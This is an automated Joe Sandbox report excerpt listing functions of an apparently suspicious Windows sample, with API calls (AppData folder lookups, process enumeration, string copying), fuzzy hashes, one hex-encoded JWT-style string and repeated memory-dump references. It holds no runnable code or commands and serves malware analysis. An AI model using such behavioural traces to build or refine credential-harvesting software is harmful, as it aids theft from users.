                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit$__getptd
                        • String ID: XuG$XuG
                        • API String ID: 441000147-3412426340
                        • Opcode ID: 3398971357c22b84344c8dc0bd867f8c252f97bcd9936d2f4b6b1cf435872872
                        • Instruction ID: e4a282f616e907db798c228954d2cadaac4e590040deb404c894971060d53f87
                        • Opcode Fuzzy Hash: 3398971357c22b84344c8dc0bd867f8c252f97bcd9936d2f4b6b1cf435872872
                        • Instruction Fuzzy Hash: BB01C432906711BBD610AB2A980579E73A46F00718F54446FE80467681EBBC6C81DBDF
                        Function 00448710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00448737
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A188
                          • Part of subcall function 0046A173: std::exception::exception.LIBCMT ref: 0046A1AE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long$yxxx$yxxx
                        • API String ID: 2002836212-1517697755
                        • Opcode ID: 1a818784cc110defeacea478c0fb537210812ed055bc3917821c15192821f429
                        • Instruction ID: 07883a3344ca230baac519e6fbdc2cad752b4f9802849d232ac06e7fe3b6da4f
                        • Opcode Fuzzy Hash: 1a818784cc110defeacea478c0fb537210812ed055bc3917821c15192821f429
                        • Instruction Fuzzy Hash: 10F0B437F000210F8314743E8D8449FB94756E53A033AD72AE91AEF359EC78EC8295D9
                        Function 004686D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0046781C: __mtinitlocknum.LIBCMT ref: 00467832
                          • Part of subcall function 0046781C: __amsg_exit.LIBCMT ref: 0046783E
                        • ___addlocaleref.LIBCMT ref: 00468756
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                        • String ID: KERNEL32.DLL$XuG$xtG
                        • API String ID: 3105635775-3157005367
                        • Opcode ID: d77a5d5aea37971aab5de6ffaa4eece88f5f43722847da804f9e9a20b66aaebd
                        • Instruction ID: 348017da31d84f16653ffc5bebcf0de2fc12f5e443ca5948a62c769184bb80cb
                        • Opcode Fuzzy Hash: d77a5d5aea37971aab5de6ffaa4eece88f5f43722847da804f9e9a20b66aaebd
                        • Instruction Fuzzy Hash: 8601C471444700EAD720AF7AD80974ABBE0AF10319F208A1FE4D9576A1DBB8A944CB1E
                        Function 0045E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045E544
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E573
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E581
                        • lstrcat.KERNEL32(?,0158D8F0), ref: 0045E59C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 43f23539766d29037e4c1468459bd70e8bc9e45550a444691b997b82f9ad0786
                        • Instruction ID: abf364d76ee78364275752a9fbf347c911aaba4115fa894713e455381dc3d6b4
                        • Opcode Fuzzy Hash: 43f23539766d29037e4c1468459bd70e8bc9e45550a444691b997b82f9ad0786
                        • Instruction Fuzzy Hash: FC51E571A5010CAFD759EB65DC86EFE37B9EB48300F40049EB90997341EE74AF848BA5
                        Function 00461FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00461FDF, 00461FF5, 004620B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: strlen
                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 39653677-4138519520
                        • Opcode ID: 07e231bc2d6b265a2b857a17362cc9f583d7c16d8d36203c8a74c4fa9ed7b531
                        • Instruction ID: b29c37b594a33b49ac455c134b53f6aa08d079de10a74a254fe5698bcbf2e883
                        • Opcode Fuzzy Hash: 07e231bc2d6b265a2b857a17362cc9f583d7c16d8d36203c8a74c4fa9ed7b531
                        • Instruction Fuzzy Hash: 28214839510589AACB20EA35C5447EEF3A6DF80361F848057CA181B342F3BA090AD79F
                        Function 0045EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0045EBB4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045EBE3
                        • lstrcat.KERNEL32(?,00000000), ref: 0045EBF1
                        • lstrcat.KERNEL32(?,0158E3E8), ref: 0045EC0C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 4afedb47898ed233d1a5ac308b5961141946c41380e41ce50e254c7399a25a2b
                        • Instruction ID: 2803d971ac3b47818fa8a9b070493c62053cf2d929ad4edcceae663f468fdeea
                        • Opcode Fuzzy Hash: 4afedb47898ed233d1a5ac308b5961141946c41380e41ce50e254c7399a25a2b
                        • Instruction Fuzzy Hash: 5831D971A10118ABDB15EF65DD45BEE73B4AF48300F5004ADBE0AA7341DE74AF848BA4
                        Function 00464480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000), ref: 00464492
                        • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004644AD
                        • CloseHandle.KERNEL32(00000000), ref: 004644B4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004644E7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                        • String ID:
                        • API String ID: 4028989146-0
                        • Opcode ID: 94b90d438ceae494a9eea31ea0e9560bcd7f40f34f19456404a84018631cbb78
                        • Instruction ID: 900abba0429f182c073aea28cdc7e7c5fd4ef74e01cf26b0f5af9975e5481143
                        • Opcode Fuzzy Hash: 94b90d438ceae494a9eea31ea0e9560bcd7f40f34f19456404a84018631cbb78
                        • Instruction Fuzzy Hash: 43F0FCF09016152FEB209B749D4DBE776A9AF55304F0005A6FA49D7280EFB88DC0C7A5
                        Function 00468FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00468FDD
                          • Part of subcall function 004687FF: __amsg_exit.LIBCMT ref: 0046880F
                        • __getptd.LIBCMT ref: 00468FF4
                        • __amsg_exit.LIBCMT ref: 00469002
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00469026
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 95a3d415f98c9a59f2fc1650583e062912d927b18c22c1b4cf1e858a97302cd1
                        • Instruction ID: 6e7052197d6cbdcf071f23cff35724878dbb770651663b67958fa39099fd8642
                        • Opcode Fuzzy Hash: 95a3d415f98c9a59f2fc1650583e062912d927b18c22c1b4cf1e858a97302cd1
                        • Instruction Fuzzy Hash: 35F06D329487109ADB60BB7A980675A23A16F0072DF24421FF444AB2D2FFBC5D40DA5F
                        Function 00467310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(------,00445BEB), ref: 0046731B
                        • lstrcpy.KERNEL32(00000000), ref: 0046733F
                        • lstrcat.KERNEL32(?,------), ref: 00467349
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcatlstrcpylstrlen
                        • String ID: ------
                        • API String ID: 3050337572-882505780
                        • Opcode ID: 6daaa8f5e4925a585e44cb5c79cfc3ade731ffb29ee7878b3a5e30f786bc9e5c
                        • Instruction ID: 7eeebcf67b9faff739f2d2706d223a12db35603d818a376a42ff3049d837b424
                        • Opcode Fuzzy Hash: 6daaa8f5e4925a585e44cb5c79cfc3ade731ffb29ee7878b3a5e30f786bc9e5c
                        • Instruction Fuzzy Hash: B7F030745103029FDB289F75D848927B6F9EF44704318982EAC9AC3314EB34D880CF20
                        Function 004533D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441557
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 00441579
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 0044159B
                          • Part of subcall function 00441530: lstrcpy.KERNEL32(00000000,?), ref: 004415FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453422
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045344B
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453471
                        • lstrcpy.KERNEL32(00000000,?), ref: 00453497
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 7e7c32339757328bfef82a78b00ab1763163b991235dcbf7c20812dabf071d4a
                        • Instruction ID: 5eed9d1be016b0ffc752e8fe0c65161fadd9f4ebc1b21a627b4cc433710cde3b
                        • Opcode Fuzzy Hash: 7e7c32339757328bfef82a78b00ab1763163b991235dcbf7c20812dabf071d4a
                        • Instruction Fuzzy Hash: F8123E70A012019FDB28CF19C554B26B7E1BF4535AB19C1AEE809CB3A2D776DD46CB48
                        Function 00457C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457C94
                        • std::_Xinvalid_argument.LIBCPMT ref: 00457CAF
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D58
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D76
                          • Part of subcall function 00457D40: std::_Xinvalid_argument.LIBCPMT ref: 00457D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
